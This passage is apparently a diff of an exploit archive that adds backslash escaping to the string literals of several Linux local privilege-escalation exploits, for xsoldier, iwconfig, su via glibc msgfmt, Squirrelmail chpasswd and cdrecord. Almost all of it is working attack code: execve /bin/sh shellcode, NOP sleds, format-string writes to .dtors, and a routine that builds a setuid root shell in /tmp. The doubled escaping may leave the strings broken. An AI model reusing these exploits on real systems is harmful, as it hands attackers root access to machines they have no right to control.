fprintf(stderr, "zorgon@antionline.org\n"); - fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE); - execl ("./xsoldier", "xsoldier", "-display", buffer, 0); + fprintf(stderr, \"xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\\n\"); + fprintf(stderr, \"zorgon@antionline.org\\n\"); + fprintf(stderr, \"[return address = %x] [offset = %d] [buffer size = %d]\\n\", ret + offset, offset, BUFSIZE); + execl (\"./xsoldier\", \"xsoldier\", \"-display\", buffer, 0); } diff --git a/platforms/linux/local/23299.c b/platforms/linux/local/23299.c index 287464ea5..493e95b44 100755 --- a/platforms/linux/local/23299.c +++ b/platforms/linux/local/23299.c @@ -19,17 +19,17 @@ Exploit: /* x86/linux shellcode */ char shellcode[]= /* 24 bytes */ - "\x31\xc0" /* xorl %eax,%eax */ - "\x50" /* pushl %eax */ - "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ - "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ - "\x89\xe3" /* movl %esp,%ebx */ - "\x50" /* pushl %eax */ - "\x53" /* pushl %ebx */ - "\x89\xe1" /* movl %esp,%ecx */ - "\x99" /* cltd */ - "\xb0\x0b" /* movb $0x0b,%al */ - "\xcd\x80"; /* int $0x80 */ + \"\\x31\\xc0\" /* xorl %eax,%eax */ + \"\\x50\" /* pushl %eax */ + \"\\x68\\x2f\\x2f\\x73\\x68\" /* pushl $0x68732f2f */ + \"\\x68\\x2f\\x62\\x69\\x6e\" /* pushl $0x6e69622f */ + \"\\x89\\xe3\" /* movl %esp,%ebx */ + \"\\x50\" /* pushl %eax */ + \"\\x53\" /* pushl %ebx */ + \"\\x89\\xe1\" /* movl %esp,%ecx */ + \"\\x99\" /* cltd */ + \"\\xb0\\x0b\" /* movb $0x0b,%al */ + \"\\xcd\\x80\"; /* int $0x80 */ int main(int argc,char **argv){ @@ -37,11 +37,11 @@ int main(int argc,char **argv){ unsigned long ret; int i; - char *prog[]={"/sbin/iwconfig",buf,NULL}; - char *env[]={"HOME=/",shellcode,NULL}; + char *prog[]={\"/sbin/iwconfig\",buf,NULL}; + char *env[]={\"HOME=/\",shellcode,NULL}; ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06; - printf("use ret addr: 0x%x\n",ret); + printf(\"use ret addr: 0x%x\\n\",ret); memset(buf,0x41,sizeof(buf)); memcpy(&buf[92],&ret,4); diff --git a/platforms/linux/local/23300.c b/platforms/linux/local/23300.c index 11ce9dbf2..239881eca 100755 --- a/platforms/linux/local/23300.c +++ b/platforms/linux/local/23300.c @@ -15,18 +15,18 @@ A problem has been identified in the iwconfig program when handling strings on t #include -#define BIN "/sbin/iwconfig" +#define BIN \"/sbin/iwconfig\" unsigned char shellcode[] = - "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e" - "\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3" - "\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0" - "\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f" - "\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb" - "\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x31\xdb" - "\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" - "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd" - "\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80"; + \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x31\\xc0\\xb0\\x2e\" + \"\\xcd\\x80\\x31\\xc0\\x53\\x68\\x77\\x30\\x30\\x74\\x89\\xe3\" + \"\\xb0\\x27\\xcd\\x80\\x31\\xc0\\xb0\\x3d\\xcd\\x80\\x31\\xc0\" + \"\\x31\\xdb\\x31\\xc9\\xb1\\x0a\\x50\\x68\\x2e\\x2e\\x2f\\x2f\" + \"\\xe2\\xf9\\x89\\xe3\\xb0\\x0c\\xcd\\x80\\x31\\xc0\\x31\\xdb\" + \"\\x6a\\x2e\\x89\\xe3\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\\xdb\" + \"\\x31\\xc9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\" + \"\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\\x0b\\xcd\" + \"\\x80\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\"; int main () @@ -40,7 +40,7 @@ main () *(add_ptr++)=ret_add; memset ((char *)out, 0x90, 1337); memcpy ((char *)out + 333, shellcode, strlen(shellcode)); - memcpy((char *)out, "OUT=", 4); + memcpy((char *)out, \"OUT=\", 4); putenv(out); execl (BIN, BIN, buf, NULL); return 0; diff --git a/platforms/linux/local/23301.c b/platforms/linux/local/23301.c index 9070fe205..da07fec1f 100755 --- a/platforms/linux/local/23301.c +++ b/platforms/linux/local/23301.c @@ -21,7 +21,7 @@ A problem has been identified in the iwconfig program when handling strings on t */ /* - * Yet another Proof Of Concept Xploit for 'iwconfig' + * Yet another Proof Of Concept Xploit for \'iwconfig\' */ @@ -32,8 +32,8 @@ A problem has been identified in the iwconfig program when handling strings on t #define RET 0xbffffc3f char shellcode[]= -"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" -"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; +\"\\xeb\\x17\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\" +\"\\x4e\\x08\\x31\\xd2\\xcd\\x80\\xe8\\xe4\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58\"; int main(int argc,char **argv) { @@ -49,7 +49,7 @@ int main(int argc,char **argv) memcpy(buff+i,shellcode,strlen(shellcode)); - execl("/sbin/iwconfig","iwconfig",buff,(char *)NULL); + execl(\"/sbin/iwconfig\",\"iwconfig\",buff,(char *)NULL); return 0; } diff --git a/platforms/linux/local/249.c b/platforms/linux/local/249.c index 60c0b2ab0..878c12f46 100755 --- a/platforms/linux/local/249.c +++ b/platforms/linux/local/249.c @@ -9,23 +9,23 @@ #include char *shellcode = -"\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb" -"\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a" -"\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47" -"\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89" -"\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b" -"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8" -"\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63" -"\x30" -"chown root /tmp/xp;chmod 4777 /tmp/xp"; +\"\\x31\\xc0\\x83\\xc0\\x17\\x31\\xdb\\xcd\\x80\\xeb\" +\"\\x30\\x5f\\x31\\xc9\\x88\\x4f\\x17\\x88\\x4f\\x1a\" +\"\\x8d\\x5f\\x10\\x89\\x1f\\x8d\\x47\\x18\\x89\\x47\" +\"\\x04\\x8d\\x47\\x1b\\x89\\x47\\x08\\x31\\xc0\\x89\" +\"\\x47\\x0c\\x8d\\x0f\\x8d\\x57\\x0c\\x83\\xc0\\x0b\" +\"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\" +\"\\xcb\\xff\\xff\\xff\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x30\\x2d\\x63\" +\"\\x30\" +\"chown root /tmp/xp;chmod 4777 /tmp/xp\"; -char *LC_MESSAGES = "/tmp/LC_MESSAGES"; +char *LC_MESSAGES = \"/tmp/LC_MESSAGES\"; int NOP_LEN = 12000; -char *msgfmt = "/usr/bin/msgfmt"; -char *objdump = "/usr/bin/objdump"; +char *msgfmt = \"/usr/bin/msgfmt\"; +char *objdump = \"/usr/bin/objdump\"; char *language = NULL; char *make_format_string(unsigned long, int, int); @@ -52,149 +52,149 @@ int main(int argc, char **argv) char randfile[1024]; char *args2[2], opt; - printf("su exploit by XP \n"); - printf("Enjoy!\n\n"); + printf(\"su exploit by XP \\n\"); + printf(\"Enjoy!\\n\\n\"); - while ((opt = getopt(argc, argv, "o:n:m:O:e:l:")) != EOF) + while ((opt = getopt(argc, argv, \"o:n:m:O:e:l:\")) != EOF) switch(opt) { - case 'o': + case \'o\': offset = atoi(optarg); break; - case 'n': + case \'n\': NOP_LEN = atoi(optarg); break; - case 'm': + case \'m\': msgfmt = strdup(optarg); break; - case 'O': + case \'O\': objdump = strdup(optarg); break; - case 'e': - sscanf(optarg, "%i:%i", &eat, &pad); + case \'e\': + sscanf(optarg, \"%i:%i\", &eat, &pad); break; - case 'l': + case \'l\': language = (char*) malloc(40 + strlen(optarg)); if (!language) { -printf("malloc failed\naborting\n"); +printf(\"malloc failed\\naborting\\n\"); exit(0); } memset(language, 0, 40 + strlen(optarg)); - sprintf(language, "LANGUAGE=%s/../../../../../../tmp", optarg); + sprintf(language, \"LANGUAGE=%s/../../../../../../tmp\", optarg); break; default: exit(0); } - printf("Phase 1. Checking paths and write permisions\n"); - printf(" Checking for %s...", msgfmt); + printf(\"Phase 1. Checking paths and write permisions\\n\"); + printf(\" Checking for %s...\", msgfmt); checkfor(msgfmt); - printf(" Checking for %s...", objdump); + printf(\" Checking for %s...\", objdump); checkfor(objdump); - printf(" Checking write permisions on /tmp..."); - if (stat("/tmp", &st) < 0) { - printf("failed. cannot stat /tmp\naborting\n"); + printf(\" Checking write permisions on /tmp...\"); + if (stat(\"/tmp\", &st) < 0) { + printf(\"failed. cannot stat /tmp\\naborting\\n\"); exit(0); } if (!(st.st_mode & S_IWOTH)) { - printf("failed. /tmp it's not +w\naborting\n"); + printf(\"failed. /tmp it\'s not +w\\naborting\\n\"); exit(0); } - printf("Ok\n"); + printf(\"Ok\\n\"); fflush(stdout); - printf(" Checking read permisions on /bin/su..."); - if (stat("/bin/su", &st) < 0) { - printf("failed. cannot stat /bin/su\naborting\n"); + printf(\" Checking read permisions on /bin/su...\"); + if (stat(\"/bin/su\", &st) < 0) { + printf(\"failed. cannot stat /bin/su\\naborting\\n\"); exit(0); } if (!(st.st_mode & S_IROTH)) { - printf("failed. /bin/su it's not +r\naborting\n"); + printf(\"failed. /bin/su it\'s not +r\\naborting\\n\"); exit(0); } - printf("Ok\n"); + printf(\"Ok\\n\"); fflush(stdout); if (!language) { - printf(" Checking for a valid language..."); + printf(\" Checking for a valid language...\"); search_valid_language(); - printf("Ok\n"); + printf(\"Ok\\n\"); } - printf(" Checking that %s does not exist...", LC_MESSAGES); + printf(\" Checking that %s does not exist...\", LC_MESSAGES); if (stat(LC_MESSAGES, &st) >= 0) { - printf("failed. %s exists\naborting\n", LC_MESSAGES); + printf(\"failed. %s exists\\naborting\\n\", LC_MESSAGES); exit(0); } - printf("Ok\n"); + printf(\"Ok\\n\"); fflush(stdout); - printf("Phase 2. Calculating eat and pad values\n "); + printf(\"Phase 2. Calculating eat and pad values\\n \"); srand(time(NULL)); - if (eat || pad) printf("skkiping, values set by user to eat = %i and -pad = %i\n", eat, pad); + if (eat || pad) printf(\"skkiping, values set by user to eat = %i and +pad = %i\\n\", eat, pad); else { calculate_eat_space(&eat, &pad); - printf("done\n eat = %i and pad = %i\n", eat, pad); + printf(\"done\\n eat = %i and pad = %i\\n\", eat, pad); } fflush(stdout); sh_addr -= offset; - printf("Phase 3. Creating evil libc.mo and setting enviroment -vars\n"); + printf(\"Phase 3. Creating evil libc.mo and setting enviroment +vars\\n\"); fflush(stdout); mkdir(LC_MESSAGES, 0755); chdir(LC_MESSAGES); - f = fopen("libc.po", "w+"); + f = fopen(\"libc.po\", \"w+\"); if (!f) { - perror("fopen()"); + perror(\"fopen()\"); exit(0); } - fprintf(f,"msgid \"%%s: invalid option -- %%c\\n\"\n"); - fprintf(f,"msgstr \"%s\\n\"", make_format_string(sh_addr, eat, 0)); + fprintf(f,\"msgid \\\"%%s: invalid option -- %%c\\\\n\\\"\\n\"); + fprintf(f,\"msgstr \\\"%s\\\\n\\\"\", make_format_string(sh_addr, eat, 0)); fclose(f); - sprintf(execbuf, "%s libc.po -o libc.mo; chmod 777 libc.mo", msgfmt); + sprintf(execbuf, \"%s libc.po -o libc.mo; chmod 777 libc.mo\", msgfmt); system(execbuf); nop_env = (char*) malloc(NOP_LEN + strlen(shellcode) + 1); if (!nop_env) { - printf("malloc failed\naborting\n"); + printf(\"malloc failed\\naborting\\n\"); exit(0); } memset(nop_env, 0x90, NOP_LEN + strlen(shellcode) + 1); - sprintf(&nop_env[NOP_LEN], "%s", shellcode); + sprintf(&nop_env[NOP_LEN], \"%s\", shellcode); env[0] = language; env[1] = NULL; - printf("Phase 4. Getting address of .dtors section of /bin/su\n "); + printf(\"Phase 4. Getting address of .dtors section of /bin/su\\n \"); dtors_addr = get_dtors_addr(); - printf("done\n .dtors is at 0x%08x\n", dtors_addr); + printf(\"done\\n .dtors is at 0x%08x\\n\", dtors_addr); fflush(stdout); - printf("Phase 5. Compiling suid shell\n"); + printf(\"Phase 5. Compiling suid shell\\n\"); fflush(stdout); make_suid_shell(); - printf("Phase 6. Executing /bin/su\n"); + printf(\"Phase 6. Executing /bin/su\\n\"); fflush(stdout); - args[0] = "/bin/su"; - args[1] = "-"; + args[0] = \"/bin/su\"; + args[1] = \"-\"; args[2] = make_ret_str(dtors_addr, pad); - args[3] = "-w"; + args[3] = \"-w\"; args[4] = nop_env; args[5] = NULL; - sprintf(randfile, "/tmp/tmprand%i", rand()); + sprintf(randfile, \"/tmp/tmprand%i\", rand()); if (!(pid = fork())) { close(1); @@ -203,11 +203,11 @@ vars\n"); dup2(fd, 1); dup2(fd, 2); execve(args[0], args, env); - printf("failed to exec /bin/su\n"); exit(0); + printf(\"failed to exec /bin/su\\n\"); exit(0); } if (pid < 0) { - perror("fork()"); + perror(\"fork()\"); exit(0); } @@ -215,32 +215,32 @@ vars\n"); unlink(randfile); - stat("/tmp/xp", &st); + stat(\"/tmp/xp\", &st); if (!(S_ISUID & st.st_mode)) { - printf("failed to put mode 4777 to /tmp/xp\naborting\n"); + printf(\"failed to put mode 4777 to /tmp/xp\\naborting\\n\"); exit(0); } - printf(" - Entering rootshell ;-) -\n"); + printf(\" - Entering rootshell ;-) -\\n\"); fflush(stdout); if (!(pid = fork())) { - args2[0] = "/tmp/xp"; + args2[0] = \"/tmp/xp\"; args2[1] = NULL; execve(args2[0], args2, NULL); - printf("failed to exec /tmp/xp\n"); + printf(\"failed to exec /tmp/xp\\n\"); exit(0); } if (pid < 0) { - perror("fork()"); + perror(\"fork()\"); exit(0); } waitpid(pid, &c, 0); - printf("Phase 7. Cleaning enviroment\n"); - sprintf(execbuf, "rm -rf %s /tmp/xp", LC_MESSAGES); + printf(\"Phase 7. Cleaning enviroment\\n\"); + sprintf(execbuf, \"rm -rf %s /tmp/xp\", LC_MESSAGES); system(execbuf); } @@ -254,17 +254,17 @@ char *make_format_string(unsigned long sh_addr, int eat, int test) memset(ret, 0, 0xffff); - for (c = 0; c < eat; c++) strcat(ret, "%8x"); + for (c = 0; c < eat; c++) strcat(ret, \"%8x\"); waste = 8 * eat; hi = (sh_addr & 0xffff0000) >> 16; lo = (sh_addr & 0xffff) - hi; if (!test) { - sprintf(&ret[strlen(ret)], "%%0%ux%%hn", hi-waste); - sprintf(&ret[strlen(ret)], "%%0%ux%%hn", lo); + sprintf(&ret[strlen(ret)], \"%%0%ux%%hn\", hi-waste); + sprintf(&ret[strlen(ret)], \"%%0%ux%%hn\", lo); } - else strcat(ret, "%8x *0x%08x* %8x *0x%08x*"); + else strcat(ret, \"%8x *0x%08x* %8x *0x%08x*\"); return ret; } @@ -276,22 +276,22 @@ unsigned long get_dtors_addr() FILE *f; unsigned long ret = 0, tmp1, tmp2, tmp3; - sprintf(file, "/tmp/tmprand%i", rand()); - sprintf(exec_buf, "%s -h /bin/su > %s", objdump, file); + sprintf(file, \"/tmp/tmprand%i\", rand()); + sprintf(exec_buf, \"%s -h /bin/su > %s\", objdump, file); system(exec_buf); - f = fopen(file, "r"); + f = fopen(file, \"r\"); if (!f) { - perror("fopen()"); + perror(\"fopen()\"); exit(0); } while (!feof(f)) { fgets(buf, 1024, f); - sscanf(buf, " %i .%s %x %x \n", &tmp1, sect, &tmp2, &tmp3); - printf("."); fflush(stdout); - if (strcmp(sect, "dtors")) continue; + sscanf(buf, \" %i .%s %x %x \\n\", &tmp1, sect, &tmp2, &tmp3); + printf(\".\"); fflush(stdout); + if (strcmp(sect, \"dtors\")) continue; ret = tmp3; break; } @@ -299,7 +299,7 @@ unsigned long get_dtors_addr() unlink(file); if (!ret) { - printf("error getting the address of .dtors\naborting"); + printf(\"error getting the address of .dtors\\naborting\"); exit(0); } @@ -344,41 +344,41 @@ void calculate_eat_space(int *eatr, int *padr) char *readbuf = NULL, *token; unsigned long t1, t2; - tmpfile[0] = '\0'; + tmpfile[0] = \'\\0\'; nop_env = (char*) malloc(NOP_LEN + strlen(shellcode) + 1); if (!nop_env) { - printf("malloc failed\naborting\n"); + printf(\"malloc failed\\naborting\\n\"); exit(0); } memset(nop_env, 0x90, NOP_LEN + strlen(shellcode) + 1); - sprintf(&nop_env[NOP_LEN], "%s", shellcode); + sprintf(&nop_env[NOP_LEN], \"%s\", shellcode); for (eat = 50; eat < 200; eat++) { for (pad = 0; pad < 4; pad++) { if (tmpfile[0]) unlink(tmpfile); - chdir("/"); + chdir(\"/\"); - sprintf(execbuf, "rm -rf %s", LC_MESSAGES); + sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES); system(execbuf); mkdir(LC_MESSAGES, 0755); chdir(LC_MESSAGES); - f = fopen("libc.po", "w+"); + f = fopen(\"libc.po\", \"w+\"); if (!f) { -perror("fopen()"); +perror(\"fopen()\"); exit(0); } - fprintf(f,"msgid \"%%s: invalid option -- %%c\\n\"\n"); - fprintf(f,"msgstr \"%s\\n\"", make_format_string(0xbfffffbb, eat, + fprintf(f,\"msgid \\\"%%s: invalid option -- %%c\\\\n\\\"\\n\"); + fprintf(f,\"msgstr \\\"%s\\\\n\\\"\", make_format_string(0xbfffffbb, eat, 1)); fclose(f); - sprintf(execbuf, "chmod 777 libc.po; %s libc.po -o libc.mo", + sprintf(execbuf, \"chmod 777 libc.po; %s libc.po -o libc.mo\", msgfmt); system(execbuf); @@ -396,10 +396,10 @@ dup2(fds[1], 2); env[0] = language; env[1] = NULL; -args[0] = "/bin/su"; -args[1] = "-"; +args[0] = \"/bin/su\"; +args[1] = \"-\"; args[2] = make_ret_str(test_value, pad); -args[3] = "-w"; +args[3] = \"-w\"; args[4] = nop_env; args[5] = NULL; @@ -407,16 +407,16 @@ execve(args[0], args, env); } if (pid < 0) { -perror("fork()"); +perror(\"fork()\"); exit(0); } close(fds[1]); - sprintf(tmpfile, "/tmp/tmprand%i", rand()); + sprintf(tmpfile, \"/tmp/tmprand%i\", rand()); tmpfd = open(tmpfile, O_RDWR | O_CREAT); if (tmpfd < 0) { -perror("open()"); +perror(\"open()\"); exit(0); } while ((l = read(fds[0], buf, 1024)) > 0) @@ -429,16 +429,16 @@ write(tmpfd, buf, l); chmod(tmpfile, 0777); - f = fopen(tmpfile, "r"); + f = fopen(tmpfile, \"r\"); if (!f) { -perror("fopen()"); +perror(\"fopen()\"); exit(0); } if (readbuf) free(readbuf); readbuf = (char*) malloc(st.st_size); if (!readbuf) { -printf("malloc failed\naborting\n"); +printf(\"malloc failed\\naborting\\n\"); exit(0); } @@ -447,15 +447,15 @@ exit(0); fread(readbuf, 1, st.st_size, f); fclose(f); - token = strtok(readbuf, "*"); + token = strtok(readbuf, \"*\"); if (!token) continue; - token = strtok(NULL, "*"); + token = strtok(NULL, \"*\"); if (!token) continue; t1 = strtoul(token, NULL, 16); - token = strtok(NULL, "*"); + token = strtok(NULL, \"*\"); if (!token) continue; - token = strtok(NULL, "*"); + token = strtok(NULL, \"*\"); if (!token) continue; t2 = strtoul(token, NULL, 16); @@ -463,7 +463,7 @@ exit(0); if (t1 == (test_value+2)) { *eatr = eat; *padr = pad; - sprintf(execbuf, "rm -rf %s", LC_MESSAGES); + sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES); system(execbuf); if (tmpfile[0]) unlink(tmpfile); return; @@ -471,16 +471,16 @@ if (t1 == (test_value+2)) { // sleep(10); } - printf("."); + printf(\".\"); fflush(stdout); } if (tmpfile[0]) unlink(tmpfile); - sprintf(execbuf, "rm -rf %s", LC_MESSAGES); + sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES); system(execbuf); - printf("failed to calculate eat and pad values. glibc patched or -invalid language?\naborting\n"); + printf(\"failed to calculate eat and pad values. glibc patched or +invalid language?\\naborting\\n\"); exit(0); } @@ -489,11 +489,11 @@ void checkfor(char *p) int fd; fd = open(p, O_RDONLY); if (fd < 0) { - printf("failed\naborting\n"); + printf(\"failed\\naborting\\n\"); exit(0); } close(fd); - printf("Ok\n"); + printf(\"Ok\\n\"); fflush(stdout); } @@ -502,30 +502,30 @@ void make_suid_shell() FILE *f; char execbuf[1024]; - f = fopen("/tmp/kidd0.c", "w"); + f = fopen(\"/tmp/kidd0.c\", \"w\"); if (!f) { - printf(" failed to create /tmp/kidd0.c\naborting\n"); + printf(\" failed to create /tmp/kidd0.c\\naborting\\n\"); exit(0); } - fprintf(f, "int main() { setuid(0); setgid(0); system(\"/bin/sh\"); -}"); + fprintf(f, \"int main() { setuid(0); setgid(0); system(\\\"/bin/sh\\\"); +}\"); fclose(f); - sprintf(execbuf, "gcc /tmp/kidd0.c -o /tmp/xp"); + sprintf(execbuf, \"gcc /tmp/kidd0.c -o /tmp/xp\"); system(execbuf); - sprintf(execbuf, "rm -f /tmp/kidd0.c"); + sprintf(execbuf, \"rm -f /tmp/kidd0.c\"); system(execbuf); - f = fopen("/tmp/xp", "r"); + f = fopen(\"/tmp/xp\", \"r\"); if (!f) { - printf(" failed to compile /tmp/kidd0.c\naborting\n"); + printf(\" failed to compile /tmp/kidd0.c\\naborting\\n\"); exit(0); } fclose(f); - printf(" /tmp/xp created Ok\n"); + printf(\" /tmp/xp created Ok\\n\"); fflush(stdout); } @@ -534,30 +534,30 @@ void search_valid_language() DIR *locale; struct dirent *dentry; - locale = opendir("/usr/share/locale"); + locale = opendir(\"/usr/share/locale\"); if (!locale) { - perror("failed to opendir /usr/share/locale"); - printf("aborting\n"); + perror(\"failed to opendir /usr/share/locale\"); + printf(\"aborting\\n\"); exit(0); } while (dentry = readdir(locale)) { - if (!strchr(dentry->d_name, '_')) continue; + if (!strchr(dentry->d_name, \'_\')) continue; language = (char*) malloc(40 + strlen(dentry->d_name)); if (!language) { - printf("malloc failed\naborting\n"); + printf(\"malloc failed\\naborting\\n\"); exit(0); } memset(language, 0, 40 + strlen(dentry->d_name)); - sprintf(language, "LANGUAGE=%s/../../../../../../tmp",dentry->d_name); + sprintf(language, \"LANGUAGE=%s/../../../../../../tmp\",dentry->d_name); closedir(locale); - printf(" [using %s] ", dentry->d_name); + printf(\" [using %s] \", dentry->d_name); return; } - printf("failed to find a valid language\naborting\n"); + printf(\"failed to find a valid language\\naborting\\n\"); exit(0); } diff --git a/platforms/linux/local/273.c b/platforms/linux/local/273.c index b0be182eb..18e7f6576 100755 --- a/platforms/linux/local/273.c +++ b/platforms/linux/local/273.c @@ -15,10 +15,10 @@ #include char shellcode[]= -"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" -"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" -"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" -"\x68"; +\"\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\\xeb\\x16\\x5b\\x31\\xc0\" +\"\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\\x43\\x0c\\xb0\\x0b\\x8d\\x4b\\x08\\x8d\" +\"\\x53\\x0c\\xcd\\x80\\xe8\\xe5\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\" +\"\\x68\"; int main(int argc, char *argv[]) { @@ -29,16 +29,16 @@ char *buffer, *ptr; buffer = malloc(200); -printf("\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\n\n"); +printf(\"\\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\\n\\n\"); if(argc != 2) { -printf("Usage: %s \n\n",argv[0]); +printf(\"Usage: %s \\n\\n\",argv[0]); exit(0); } ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]); -// printf("Using ret = 0x%x\n\n", ret); +// printf(\"Using ret = 0x%x\\n\\n\", ret); ptr = buffer; addr_ptr = (long *) ptr; @@ -49,7 +49,7 @@ for(i=0; i < 200; i+=4) buffer[200-1] = 0; -execle(argv[1], "chpasswd", buffer, "0x314", "m0s", 0, env); +execle(argv[1], \"chpasswd\", buffer, \"0x314\", \"m0s\", 0, env); free(buffer); diff --git a/platforms/linux/local/31.pl b/platforms/linux/local/31.pl index 9673f840c..3fb3e4800 100755 --- a/platforms/linux/local/31.pl +++ b/platforms/linux/local/31.pl @@ -9,25 +9,25 @@ # Cdrecord 2.0 (i586-mandrake-linux-gnu) # # scsibus: -1 target: -1 lun: -1 -# Warning: Open by 'devname' is unintentional and not supported. -# /usr/bin/cdrecord: No such file or directory. Cannot open '. Cannot open SCSI driver. -# /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root. -# /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord dev=help'. +# Warning: Open by \'devname\' is unintentional and not supported. +# /usr/bin/cdrecord: No such file or directory. Cannot open \'. Cannot open SCSI driver. +# /usr/bin/cdrecord: For possible targets try \'cdrecord -scanbus\'. Make sure you are root. +# /usr/bin/cdrecord: For possible transport specifiers try \'cdrecord dev=help\'. # sh-2.05b# id # uid=0(root) gid=0(root) groups=503(wsxz) # sh-2.05b# ##################################################### $shellcode = - "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0 - "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0 - "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89". - "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c". - "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff". - "\xff\xff/bin/sh"; + \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\".#setuid 0 + \"\\x31\\xdb\\x89\\xd8\\xb0\\x2e\\xcd\\x80\".#setgid 0 + \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\". + \"\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\". + \"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\". + \"\\xff\\xff/bin/sh\"; - $cdrecordpath = "/usr/bin/cdrecord"; - $nop = "\x90"; # x86 NOP + $cdrecordpath = \"/usr/bin/cdrecord\"; + $nop = \"\\x90\"; # x86 NOP $offset = 0; # Default offset to try. @@ -35,45 +35,45 @@ $target = $ARGV[0]; $offset = $ARGV[1]; }else{ - printf(" Priv8security.com Cdrecord local root exploit!!\n"); - printf(" usage: $0 target\n"); - printf(" List of targets:\n"); - printf(" 1 - Linux Mandrake 8.2 Cdrecord 1.11a15\n"); - printf(" 2 - Linux Mandrake 9.0 Cdrecord 1.11a32\n"); - printf(" 3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\n"); - printf(" 4 - Linux Mandrake 9.1 Cdrecord 2.0\n"); + printf(\" Priv8security.com Cdrecord local root exploit!!\\n\"); + printf(\" usage: $0 target\\n\"); + printf(\" List of targets:\\n\"); + printf(\" 1 - Linux Mandrake 8.2 Cdrecord 1.11a15\\n\"); + printf(\" 2 - Linux Mandrake 9.0 Cdrecord 1.11a32\\n\"); + printf(\" 3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\\n\"); + printf(\" 4 - Linux Mandrake 9.1 Cdrecord 2.0\\n\"); exit(1); } - if ( $target eq "1" ) { + if ( $target eq \"1\" ) { $retword = 0x0807af38; #Mr .dtors ;) - $fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:"; + $fmtstring = \"%.134727238x%x%x%x%x%x%x%x%x%n:\"; } - if ( $target eq "2" ) { + if ( $target eq \"2\" ) { # $retword = 0x08084578; #.dtors $retword = 0x08084684; #.GOT exit - $fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:"; + $fmtstring = \"%.134769064x%x%x%x%x%x%x%x%x%n:\"; } - if ( $target eq "3" ) { + if ( $target eq \"3\" ) { $retword = 0x0807f658; - $fmtstring = "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:"; + $fmtstring = 